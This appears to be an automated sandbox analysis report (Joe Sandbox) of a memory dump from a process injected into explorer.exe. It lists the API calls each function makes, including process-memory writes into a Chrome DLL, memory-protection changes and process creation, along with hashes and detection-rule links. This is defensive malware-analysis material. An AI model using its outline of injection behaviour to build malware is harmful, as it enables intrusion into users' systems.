Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: Time$File$System$Locallstrlen
String ID:
API String ID: 3300006614-0
Opcode ID: 21259a68e82bd00b51b165e20971f1ce834a23ea1e788eb75d2f409d8afc8eb7
Instruction ID: b72a8acbdea124ea082633fe2d6128d9059b49901257229dfa6c65bcb2bca2a3
Opcode Fuzzy Hash: 21259a68e82bd00b51b165e20971f1ce834a23ea1e788eb75d2f409d8afc8eb7
Instruction Fuzzy Hash: 21513A71604306AFC760DF69C8809AFB7ECFB89205F04092EF695DB150E734E949DBA6

Uniqueness

Uniqueness Score: -1,00%

Function 01550A72, Relevance: 7.7, APIs: 5, Instructions: 155memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00003000), ref: 01550B6C
wsprintfA.USER32 ref: 01550B99
memcpy.NTDLL(00000000,00000000,00003000), ref: 01550BE3
InterlockedExchange.KERNEL32(01598F50,00000000), ref: 01550BFD
HeapFree.KERNEL32(00000000,00000000), ref: 01550C31

Part of subcall function 01546863: RtlAllocateHeap.NTDLL(00000000,00003001,00000000), ref: 0154688A
Part of subcall function 01546863: memcpy.NTDLL(00000000,01550E80,00003000,?,01550E80,?), ref: 0154689B
Part of subcall function 01546863: RtlEnterCriticalSection.NTDLL(01599448), ref: 015468AB
Part of subcall function 01546863: RtlLeaveCriticalSection.NTDLL(01599448), ref: 015468BF
Part of subcall function 01546863: HeapFree.KERNEL32(00000000,00000000,?), ref: 015468F0

Part of subcall function 01552658: lstrlen.KERNEL32(?,00000000,00000000,?,?,01541D4B,0000010D,00000000), ref: 01552689
Part of subcall function 01552658: RtlAllocateHeap.NTDLL(00000000,01541D4B,00000000), ref: 015526A0
Part of subcall function 01552658: memcpy.NTDLL(0000000C,?,00000000,?,?,01541D4B,0000010D), ref: 015526CB
Part of subcall function 01552658: memcpy.NTDLL(0000000C,00000000,01541D4B,?,?,01541D4B), ref: 015526E6
Part of subcall function 01552658: CallNamedPipeA.KERNEL32(00000000,01541D4B,?,0000000C,00000119,00000001), ref: 01552704
Part of subcall function 01552658: GetLastError.KERNEL32(?,?,01541D4B), ref: 0155270E
Part of subcall function 01552658: HeapFree.KERNEL32(00000000,00000000), ref: 01552737

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: Heap$memcpy$AllocateFree$CriticalSection$CallEnterErrorExchangeInterlockedLastLeaveNamedPipelstrlenwsprintf
String ID:
API String ID: 4160993441-0
Opcode ID: 37ae34d5660e4275b181533aebfb4ca5c921fe3f4f7ecfd5fd8ecf3aaef3bfcf
Instruction ID: 917b71505fee569effdce6e5e44c42a8e33318a8cdbc31728b8fedf9d246ca8c
Opcode Fuzzy Hash: 37ae34d5660e4275b181533aebfb4ca5c921fe3f4f7ecfd5fd8ecf3aaef3bfcf
Instruction Fuzzy Hash: 2A519C72900219EFDF61CFA9CC94BAEBBB9FB44314F064125F915AF284D7709A04DBA1

Uniqueness

Uniqueness Score: -1,00%

Function 0156AA35, Relevance: 7.6, APIs: 5, Instructions: 123stringthreadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0156AA76
OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0156AB11
_strupr.NTDLL ref: 0156AB3C
lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000104), ref: 0156AB49
CloseHandle.KERNEL32(00000000), ref: 0156AB5F

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: CloseCurrentHandleOpenProcessThread_struprlstrlen
String ID:
API String ID: 3785718266-0
Opcode ID: 7e0f6b39b896a9334f2385ed6709c6ff70bdc385c75bd7acb0e5d320cd1c2350
Instruction ID: cf19d63bb97d24644abbc074e8cce7759687dbb79f0965bd7fb72ac72e5e22bd
Opcode Fuzzy Hash: 7e0f6b39b896a9334f2385ed6709c6ff70bdc385c75bd7acb0e5d320cd1c2350
Instruction Fuzzy Hash: FD415C71D00219EBEF219FA8CC49BDEBBB9FB45700F158466E614BB060D7758A84DFA0

Uniqueness

Uniqueness Score: -1,00%

Function 01555F86, Relevance: 7.6, APIs: 5, Instructions: 118memorystringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(?,?), ref: 01555FBD
RtlAllocateHeap.NTDLL(00000000,?), ref: 01556033
HeapFree.KERNEL32(00000000,00000000), ref: 015560C5

Part of subcall function 015620A0: lstrlenW.KERNEL32(?,?,?,?,?,01541A1E,?,?,00000000,?,?,0159A213,?,?), ref: 015620A9
Part of subcall function 015620A0: memcpy.NTDLL(00000000,?,?,?,?,?,?,?,?,01541A1E,?,?,00000000,?,?,0159A213), ref: 015620D3
Part of subcall function 015620A0: memset.NTDLL ref: 015620E7

lstrcpyW.KERNEL32(00000000), ref: 0155608B

Part of subcall function 01562322: HeapFree.KERNEL32(00000000,?), ref: 01562392

RemoveDirectoryW.KERNEL32(00000000), ref: 015560B2

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: Heap$Freelstrcpy$AllocateDirectoryRemovelstrlenmemcpymemset
String ID:
API String ID: 2266144330-0
Opcode ID: 1c10ea8f4203e42bf5648fda45314f9188278e110f961379bedc324185bf25ed
Instruction ID: 095cd7034e6d5b6d4ce0f23049e8dbfc03a150bd80eb9a34de1c810c220a0220
Opcode Fuzzy Hash: 1c10ea8f4203e42bf5648fda45314f9188278e110f961379bedc324185bf25ed
Instruction Fuzzy Hash: 2A41687190011DBFDF219FA4EC89DAE7BBDFB04310B024066FA10AB164D7719E18EBA1

Uniqueness

Uniqueness Score: -1,00%

Function 01547B34, Relevance: 7.6, APIs: 5, Instructions: 116memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 01560699: GetTickCount.KERNEL32(00000000,?,?,?,01541441,000004D2), ref: 015606C6
Part of subcall function 01560699: GetTempFileNameA.KERNEL32(00000000,00000000,?), ref: 015606D4
Part of subcall function 01560699: lstrcpy.KERNEL32(00000000), ref: 015606EB

lstrlen.KERNEL32(00000000,0159ADEC,00000000,0159AD9E,00000000,0159AD8C,00000000,0159AD78,00000000,0159AE75,00000000,0159AE6A,00000000,0159AD68,00000000,00002334), ref: 01547BFF
RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 01547C14
wsprintfA.USER32 ref: 01547C29
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 01547C45

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: Heap$AllocateCountFileFreeNameTempTicklstrcpylstrlenwsprintf
String ID:
API String ID: 3167371612-0
Opcode ID: 3eb258f59dfd25db44615e90221e5f1a0cda5429fe428c5f3dc6154ffc2e890e
Instruction ID: 3c4e729baea1161baecaa7a369907528993f6582a48ef2ee258e462fad48a6cf
Opcode Fuzzy Hash: 3eb258f59dfd25db44615e90221e5f1a0cda5429fe428c5f3dc6154ffc2e890e
Instruction Fuzzy Hash: 94318B329416636BD63125AE9D89E1F7D98FBC9F18B0A0569FF507F204DB718C0042F6

Uniqueness

Uniqueness Score: -1,00%

Function 0155F7A9, Relevance: 7.6, APIs: 5, Instructions: 111stringinjectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNEL32(000000FF,?,?,01598FD4,00000000,015934B0,00000018,0155FA0F,CHROME_CHILD.DLL,00000000,00000000), ref: 0155F7F1
VirtualFree.KERNEL32(?,00000000,00008000), ref: 0155F808

Part of subcall function 0154157B: HeapFree.KERNEL32(00000000,?,015606F9), ref: 01541587

GetLastError.KERNEL32 ref: 0155F880
lstrlen.KERNEL32(00000000), ref: 0155F8A5
lstrcpy.KERNEL32(00000000,00000000), ref: 0155F8C6

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: Free$ErrorHeapLastMemoryProcessVirtualWritelstrcpylstrlen
String ID:
API String ID: 1424470457-0
Opcode ID: d8e3c3a5b6706d34cca0f69f60c2ee4a6b07719e8bab9292c17d2e596c975dbb
Instruction ID: 60f42c702eac38e400ded81607d3800d5da100284865b2c01209dac4887acd42
Opcode Fuzzy Hash: d8e3c3a5b6706d34cca0f69f60c2ee4a6b07719e8bab9292c17d2e596c975dbb
Instruction Fuzzy Hash: C441827190070AEFDB719FA9CC54EAEBBB5FF48310B01461BE666AA5A0D730E405DF60

Uniqueness

Uniqueness Score: -1,00%

Function 0155F368, Relevance: 7.6, APIs: 5, Instructions: 108memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(00000000,00000004,00000040,00000000,?,00000000,?,?,00000000,015934E0,00000014,0155F9CA,?,?,?,00000000), ref: 0155F400
VirtualProtect.KERNEL32(00000000,00000004,00000000,00000000,?,0155184C), ref: 0155F436
RtlEnterCriticalSection.NTDLL(01599400), ref: 0155F44D
RtlLeaveCriticalSection.NTDLL(01599400), ref: 0155F46B
GetLastError.KERNEL32(?,0155184C), ref: 0155F484

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: CriticalProtectSectionVirtual$EnterErrorLastLeave
String ID:
API String ID: 653387826-0
Opcode ID: 34257dcea79a07eb3dc6b097313366c025c43c466fc85b2b5fc3f5f5e6ccc6dc
Instruction ID: 8ccacd1039c0149e333b33cbc613a3947612788157b6f1e9d6a1a11754c4c5ea
Opcode Fuzzy Hash: 34257dcea79a07eb3dc6b097313366c025c43c466fc85b2b5fc3f5f5e6ccc6dc
Instruction Fuzzy Hash: 19414774A00206EFDB61CF68D894AAEBBF4FB08754F01881AE9299F251E734D605DF91

Uniqueness

Uniqueness Score: -1,00%

Function 01545525, Relevance: 7.6, APIs: 5, Instructions: 98timememoryCOMMON

Download Yara Rule

APIs

OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 0154553C
CreateWaitableTimerA.KERNEL32(01599084,?,?), ref: 0154555B
GetLastError.KERNEL32 ref: 0154556B

Part of subcall function 01544626: RtlAllocateHeap.NTDLL(00000000,0159A213), ref: 01544677

GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 015455B2
HeapFree.KERNEL32(00000000,00000002,00000000), ref: 015455E6

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: HeapTimeTimerWaitable$AllocateCreateErrorFileFreeLastOpenSystem
String ID:
API String ID: 1576567574-0
Opcode ID: 4782f87dc5d1a10850c29923698f82970b46cb02250b1d9e756f7dcbc32043d4
Instruction ID: 52ff597f84384f3e260f7c5ebb93a8806e16bec77b514414f44aee40177ba29b
Opcode Fuzzy Hash: 4782f87dc5d1a10850c29923698f82970b46cb02250b1d9e756f7dcbc32043d4
Instruction Fuzzy Hash: C331673151121AAFCF22DF59DC888EF7F7AFF457A8B518018F8299E150E7308944DBA1

Uniqueness

Uniqueness Score: -1,00%

Function 0154FE57, Relevance: 7.6, APIs: 5, Instructions: 96memorystringCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00000007), ref: 0154FEDE
lstrcpy.KERNEL32(00000000,0159A3CE), ref: 0154FEF0
lstrcpyn.KERNEL32(00000006,?,00000001), ref: 0154FEFD
lstrlen.KERNEL32(0159A3CE), ref: 0154FF0F

Part of subcall function 01550507: RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 01550528
Part of subcall function 01550507: wsprintfA.USER32 ref: 0155053D
Part of subcall function 01550507: HeapFree.KERNEL32(00000000,00000000), ref: 0155058C

HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0154FF40

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: Heap$AllocateFree$lstrcpylstrcpynlstrlenwsprintf
String ID:
API String ID: 3955290140-0
Opcode ID: 586bb5e845ba537fa1ca469f8633b2a02e5417bccbb349be8db8759c62c8e30a
Instruction ID: 73f7c5ca7d7e1384be5a606ebdf0ed5f47d990ada94801dcf6274804617b44b4
Opcode Fuzzy Hash: 586bb5e845ba537fa1ca469f8633b2a02e5417bccbb349be8db8759c62c8e30a
Instruction Fuzzy Hash: 48315A3250020ABFEB21DFADDC89EAF7FB9FF45214F004125F9289A254D7749A14DBA0

Uniqueness

Uniqueness Score: -1,00%

Function 01569C52, Relevance: 7.6, APIs: 5, Instructions: 89COMMON

Download Yara Rule

APIs

Part of subcall function 01541566: RtlAllocateHeap.NTDLL(00000000,?,015606B7), ref: 01541572

memset.NTDLL ref: 01569C97
RtlEnterCriticalSection.NTDLL(?), ref: 01569D0C
QueueUserWorkItem.KERNEL32(0156991E,?,00000010), ref: 01569D1A
GetLastError.KERNEL32 ref: 01569D36
RtlLeaveCriticalSection.NTDLL(?), ref: 01569D42

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: CriticalSection$AllocateEnterErrorHeapItemLastLeaveQueueUserWorkmemset
String ID:
API String ID: 2702030533-0
Opcode ID: a46bd2fd0ac3d51bc6468ce51507575a740ac5af2bd9d405c792d47a2f2d7c94
Instruction ID: 8990fee52067806b220feb343e2d9651d5d72f71da9563de2ad002e67fcee7ab
Opcode Fuzzy Hash: a46bd2fd0ac3d51bc6468ce51507575a740ac5af2bd9d405c792d47a2f2d7c94
Instruction Fuzzy Hash: AB315CB190130AFFEB209F98C985AAEBFBCFF15748F10452AE6559B190D3709A44DBD0

Uniqueness

Uniqueness Score: -1,00%

Function 015508F3, Relevance: 7.6, APIs: 5, Instructions: 85memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 0154650C: RtlEnterCriticalSection.NTDLL(01599448), ref: 01546514
Part of subcall function 0154650C: RtlLeaveCriticalSection.NTDLL(01599448), ref: 01546529
Part of subcall function 0154650C: InterlockedIncrement.KERNEL32(00000014), ref: 01546542

RtlAllocateHeap.NTDLL(00000000,?,0159B2A3), ref: 01550923
memcpy.NTDLL(00000000,?,?,?,00000119,?,?,?,?,?,?,?,01543AAD,?,00000000), ref: 01550934
lstrcmpi.KERNEL32(00000002,?), ref: 0155097A
memcpy.NTDLL(00000000,?,?,?,00000119,?,?,?,?,?,?,?,01543AAD,?,00000000), ref: 0155098E
HeapFree.KERNEL32(00000000,00000000,0159B2A3), ref: 015509CD

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: CriticalHeapSectionmemcpy$AllocateEnterFreeIncrementInterlockedLeavelstrcmpi
String ID:
API String ID: 733514052-0
Opcode ID: fa858f8df471622acb1bf7d02d7012b6a7f0e3602e6603ba5c8a3d1956070647
Instruction ID: d5d04bfff1a3ea088ba1b40223ef17780f3561fbff64b09f9660ae81d5c51d58
Opcode Fuzzy Hash: fa858f8df471622acb1bf7d02d7012b6a7f0e3602e6603ba5c8a3d1956070647
Instruction Fuzzy Hash: 9E210571900219BFEF609FA8DC94BAE7FB9FF45324F144029F905AB244D7718D449B90

Uniqueness

Uniqueness Score: -1,00%

Function 01547400, Relevance: 7.6, APIs: 5, Instructions: 79processCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 01547415

Part of subcall function 0155FDA6: lstrlenW.KERNEL32(00000000,?,00000000,01547976,?,?,00000000,?,?,?,?,015414D1,00000000,00000000,00000004), ref: 0155FDC1

CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,01547837,00000044,?), ref: 01547458
WaitForMultipleObjects.KERNEL32(00000002,01547837,00000000,000000FF), ref: 01547479
GetExitCodeProcess.KERNEL32(?,00000000), ref: 01547496
GetLastError.KERNEL32 ref: 015474AE

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: Process$CodeCreateErrorExitLastMultipleObjectsWaitlstrlenmemset
String ID:
API String ID: 1132779612-0
Opcode ID: 754fd24c71ad40a38b7904e5e993a647f458717c5d37ef735e58ff505dec5ff9
Instruction ID: aea2a73e3c31f21a131ae653333135cb4d4656e1fe6316692b5677f4136e907c
Opcode Fuzzy Hash: 754fd24c71ad40a38b7904e5e993a647f458717c5d37ef735e58ff505dec5ff9
Instruction Fuzzy Hash: B0213B75901219FBDB11EFA8DC859EFBFB9FB48314F108016E629AB150D3345A05DBA1

Uniqueness

Uniqueness Score: -1,00%

Function 0155FDDD, Relevance: 7.6, APIs: 5, Instructions: 72fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0155FDFB
GetFileSize.KERNEL32(00000000,00000000,?,?,0155FEAC,00000000,01547C55,01547C55,00000000,00000000,00000000,015478C7,01547C55,01547C55,00000000,00000000), ref: 0155FE0B
ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0155FE37
GetLastError.KERNEL32(?,?,0155FEAC,00000000,01547C55,01547C55,00000000,00000000,00000000,015478C7,01547C55,01547C55,00000000,00000000,00000000), ref: 0155FE5C
CloseHandle.KERNEL32(000000FF), ref: 0155FE6D

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: File$CloseCreateErrorHandleLastReadSize
String ID:
API String ID: 3577853679-0
Opcode ID: 9ab5a17c23c77ff6a62f487d22dc68f0534ec1b10d54c28b00a55d6ea82de9bd
Instruction ID: 88c15fe4fa286ba86b845dabd225819e5061f5fbeb621a0d6c244abf93890cb3
Opcode Fuzzy Hash: 9ab5a17c23c77ff6a62f487d22dc68f0534ec1b10d54c28b00a55d6ea82de9bd
Instruction Fuzzy Hash: 5111D572500215AFEBB06E6CDC989AF7F68FB44A60F054527FE25AF151C6309D44A7A0

Uniqueness

Uniqueness Score: -1,00%

Function 0154AE3A, Relevance: 7.6, APIs: 5, Instructions: 67memorysynchronizationCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00002000), ref: 0154AE68
GetLastError.KERNEL32 ref: 0154AE8B
WaitForSingleObject.KERNEL32(?,000000FF), ref: 0154AE9E
GetLastError.KERNEL32 ref: 0154AEA9
HeapFree.KERNEL32(00000000,00000000), ref: 0154AEF1

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: ErrorHeapLast$AllocateFreeObjectSingleWait
String ID:
API String ID: 1671499436-0
Opcode ID: f74bdf6d2aa72ce1e249b72027067a458df98647aecb0750cf5b2e89ff142f73
Instruction ID: c5fee9862f4c61164a46ba6c8a0eeb706396362711127ab99aa8963cd41cb12d
Opcode Fuzzy Hash: f74bdf6d2aa72ce1e249b72027067a458df98647aecb0750cf5b2e89ff142f73
Instruction Fuzzy Hash: 86218E35140204AFEBB18B68D889B5E7BB9FB01319F610528F1229F5E1C7719999EB10

Uniqueness

Uniqueness Score: -1,00%

Function 0154142F, Relevance: 7.6, APIs: 5, Instructions: 65filememoryCOMMON

Download Yara Rule

APIs

Part of subcall function 01560699: GetTickCount.KERNEL32(00000000,?,?,?,01541441,000004D2), ref: 015606C6
Part of subcall function 01560699: GetTempFileNameA.KERNEL32(00000000,00000000,?), ref: 015606D4
Part of subcall function 01560699: lstrcpy.KERNEL32(00000000), ref: 015606EB

DeleteFileA.KERNEL32(00000000,000004D2), ref: 01541452
CreateDirectoryA.KERNEL32(00000000,00000000), ref: 0154145B
GetLastError.KERNEL32 ref: 01541465
HeapFree.KERNEL32(00000000,00000000), ref: 015414E9

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: File$CountCreateDeleteDirectoryErrorFreeHeapLastNameTempTicklstrcpy
String ID:
API String ID: 1271196238-0
Opcode ID: 3a3b2e2a9453d4cf8410735c729686bbc5cf086734b72d707238b28f4c14bb2f
Instruction ID: bdc660d8a130d1cd3eca6be8ea4218ddc5db556852671dd8ea254ccdf337407d
Opcode Fuzzy Hash: 3a3b2e2a9453d4cf8410735c729686bbc5cf086734b72d707238b28f4c14bb2f
Instruction Fuzzy Hash: 2A013079246A233BCA3072BB5C4AE4B3D0DFF966B9F010015B628EF1859AA0545492F7

Uniqueness

Uniqueness Score: -1,00%

Function 01546863, Relevance: 7.6, APIs: 5, Instructions: 57memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0154F5E3: lstrlen.KERNEL32(?,?,00000000,?,01546727,00000000), ref: 0154F5EF

RtlAllocateHeap.NTDLL(00000000,00003001,00000000), ref: 0154688A
memcpy.NTDLL(00000000,01550E80,00003000,?,01550E80,?), ref: 0154689B
RtlEnterCriticalSection.NTDLL(01599448), ref: 015468AB
RtlLeaveCriticalSection.NTDLL(01599448), ref: 015468BF
HeapFree.KERNEL32(00000000,00000000,?), ref: 015468F0

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: CriticalHeapSection$AllocateEnterFreeLeavelstrlenmemcpy
String ID:
API String ID: 2349942465-0
Opcode ID: c8a82d1b1d5e52c4c8aa697384b946cae61983db8d68ae7d22e1735083552d94
Instruction ID: 07dc571937d975a26c2199204f7c4be667f6d443e46448b9d1fe2466b1854d51
Opcode Fuzzy Hash: c8a82d1b1d5e52c4c8aa697384b946cae61983db8d68ae7d22e1735083552d94
Instruction Fuzzy Hash: 9711C675100306EFEB218F68DC85A6ABBFDFF86324B020139F5168B255DB70AD45DBA0

Uniqueness

Uniqueness Score: -1,00%

Function 01560D8F, Relevance: 7.6, APIs: 5, Instructions: 55COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 01560DB7
RtlGetVersion.NTDLL(?), ref: 01560DD0
GetCurrentProcessId.KERNEL32(?,?,00000000), ref: 01560DDF
OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000), ref: 01560DED
CloseHandle.KERNEL32(00000000), ref: 01560E58

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: Process$CloseCurrentHandleOpenVersionmemset
String ID:
API String ID: 3667074770-0
Opcode ID: 0ecc164ead38fc128cdf03aef421ae4179cbbcdfd13b9fc85e8cb9fa189ef0cc
Instruction ID: 20c35ed3e8328c0f5f93e557e742a6535378dfae025133f09b17ef3bcb3cd87d
Opcode Fuzzy Hash: 0ecc164ead38fc128cdf03aef421ae4179cbbcdfd13b9fc85e8cb9fa189ef0cc
Instruction Fuzzy Hash: 581190B0841215ABDB60DB2CA886ADD76FCF748314F024219F534DF288D6706948ABD6

Uniqueness

Uniqueness Score: -1,00%

Function 01542480, Relevance: 7.6, APIs: 5, Instructions: 54filememorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 01560699: GetTickCount.KERNEL32(00000000,?,?,?,01541441,000004D2), ref: 015606C6
Part of subcall function 01560699: GetTempFileNameA.KERNEL32(00000000,00000000,?), ref: 015606D4
Part of subcall function 01560699: lstrcpy.KERNEL32(00000000), ref: 015606EB

strcpy.NTDLL ref: 015424B1
InterlockedIncrement.KERNEL32(01598E50), ref: 015424BE

Part of subcall function 01562E51: CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 01562E8B
Part of subcall function 01562E51: SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000), ref: 01562EB6
Part of subcall function 01562E51: memset.NTDLL ref: 01562F13
Part of subcall function 01562E51: memset.NTDLL ref: 01562F7B

InterlockedDecrement.KERNEL32(01598E50), ref: 015424CE
DeleteFileA.KERNEL32(00000000), ref: 015424E4
HeapFree.KERNEL32(00000000,00000000), ref: 015424F3

Part of subcall function 01547966: GetFileAttributesA.KERNEL32(00000000,?,?,00000000,?,?,?,?,015414D1,00000000,00000000,00000004), ref: 01547986

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: File$InterlockedTimerWaitablememset$AttributesCountCreateDecrementDeleteFreeHeapIncrementNameTempTicklstrcpystrcpy
String ID:
API String ID: 10370026-0
Opcode ID: 21156d9e17372111dd382eedc16d89c03a20a6ec0eb580edb150c17e4725734e
Instruction ID: c8bfc1cdb74e7054a1eac1083cdc5c6a47965570ed70618a25fed5b7f286993d
Opcode Fuzzy Hash: 21156d9e17372111dd382eedc16d89c03a20a6ec0eb580edb150c17e4725734e
Instruction Fuzzy Hash: 2F01F7312053117FF6202669BCCAF6F666CFBD5B25F124429F705AF184DEB1480452B2

Uniqueness

Uniqueness Score: -1,00%

Function 01562B89, Relevance: 7.5, APIs: 3, Strings: 2, Instructions: 48COMMON

Download Yara Rule

APIs

Part of subcall function 01541566: RtlAllocateHeap.NTDLL(00000000,?,015606B7), ref: 01541572

memcpy.NTDLL(00000000,00004D42,0000000E,?), ref: 01562BCB
memcpy.NTDLL(0000000E,?,00000028,00000000,00004D42,0000000E,?), ref: 01562BD9
memcpy.NTDLL(00000036,?,?,0000000E,?,00000028,00000000,00004D42,0000000E,?), ref: 01562BE6

Strings

6, xrefs: 01562BB2
BM, xrefs: 01562BA9

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: memcpy$AllocateHeap
String ID: 6$BM
API String ID: 4068229299-23234295
Opcode ID: 82ace105d45c16102dcfcad3fe77fb3974663d5f6dc5ec7b276b5b4b3584dafe
Instruction ID: 9e8d89eb731f885a175ea199d8db7f7b326064df8cce1e542671de66a62440d8
Opcode Fuzzy Hash: 82ace105d45c16102dcfcad3fe77fb3974663d5f6dc5ec7b276b5b4b3584dafe
Instruction Fuzzy Hash: 88010C7550060BBFDB11EFA9C944DDBBBBDFF88254F014425E654EB210E630E6198BA1

Uniqueness

Uniqueness Score: -1,00%

Function 01542409, Relevance: 7.5, APIs: 5, Instructions: 46timeCOMMON

Download Yara Rule

APIs

CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 01542417
SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000), ref: 0154243E
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 01542458
ResetEvent.KERNEL32 ref: 0154246B
CloseHandle.KERNEL32(00000000), ref: 01542472

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: TimerWaitable$CloseCreateEventHandleMultipleObjectsResetWait
String ID:
API String ID: 3480278147-0
Opcode ID: b11ad5b69f96a17616960791799ff85fbd5abcc25465524dc2d27f5244f08b89
Instruction ID: 793d571a9bda98858eafcf0718e98dcb88ece2eb470486a7e749e559308f5384
Opcode Fuzzy Hash: b11ad5b69f96a17616960791799ff85fbd5abcc25465524dc2d27f5244f08b89
Instruction Fuzzy Hash: A8017C7A902134BBDB31AAA9AC4D9AFBE7CEB46670B014611F9229B194D2304544DBE0

Uniqueness

Uniqueness Score: -1,00%

Function 01542324, Relevance: 7.5, APIs: 5, Instructions: 37memorystringCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(01598E48,00000000), ref: 01542330
RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 0154234B
lstrcpy.KERNEL32(00000000), ref: 0154235E
lstrcat.KERNEL32(00000000,0159A476), ref: 0154236A
HeapFree.KERNEL32(00000000,00000000,?), ref: 0154238B

Part of subcall function 0156A1A3: SetEvent.KERNEL32(?,0156A192), ref: 0156A1B7
Part of subcall function 0156A1A3: WaitForSingleObject.KERNEL32(?,000000FF), ref: 0156A1D1
Part of subcall function 0156A1A3: CloseHandle.KERNEL32(00000000), ref: 0156A1DA
